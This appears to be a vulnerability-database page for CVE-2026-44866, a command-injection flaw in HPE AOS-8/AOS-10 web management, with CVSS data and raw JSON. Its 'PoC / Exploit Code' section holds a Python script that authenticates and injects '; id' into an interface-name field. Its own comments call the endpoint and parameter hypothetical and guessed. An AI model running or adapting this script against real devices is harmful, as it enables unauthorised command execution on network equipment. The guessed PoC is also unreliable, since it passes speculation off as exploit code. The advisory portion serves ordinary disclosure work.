Security Vulnerability Report
CVE-2026-44866 CVSS 7.2 HIGH

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

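HPE AOS-8 (for the specific affected versions, refer to the vendor advisory)
HPE AOS-10 (for the specific affected versions, refer to the vendor advisory)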

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: HPE AOS Command Injection (CVE-2026-44866)
# Date: 2026-05-12
# Author: Security Researcher
# Vulnerable Product: HPE AOS-8, AOS-10
# CVE: CVE-2026-44866

import requests


def exploit(target_ip, username, password):
    # The endpoint might vary, this is a hypothetical example based on the description
    target_url = f"https://{target_ip}/admin/network_config"

    # Payload to execute a simple command (e.g., id)
    # Injecting via a hypothetical parameter 'interface'
    payload = "; id"

    session = requests.Session()

    # Step 1: Authenticate
    login_data = {
        "username": username,
        "password": password
    }

    try:
        login_resp = session.post(f"https://{target_ip}/login", data=login_data, verify=False)
        if login_resp.status_code != 200:
            print("Login failed")
            return

        print("Login successful.")

        # Step 2: Send Exploit Payload
        # Assuming the vulnerable parameter takes a network interface name or similar config
        exploit_data = {
            "interface_name": f"eth0{payload}",
            "action": "save"
        }

        response = session.post(target_url, data=exploit_data, verify=False)

        # Check if command output is reflected or if status indicates success
        if response.status_code == 200:
            print(f"Exploit sent. Response: {response.text[:200]}")
        else:
            print("Exploit request failed.")

    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target details
    exploit("192.168.1.1", "admin", "admin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44866", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.243", "lastModified": "2026-05-12T20:16:45.243", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}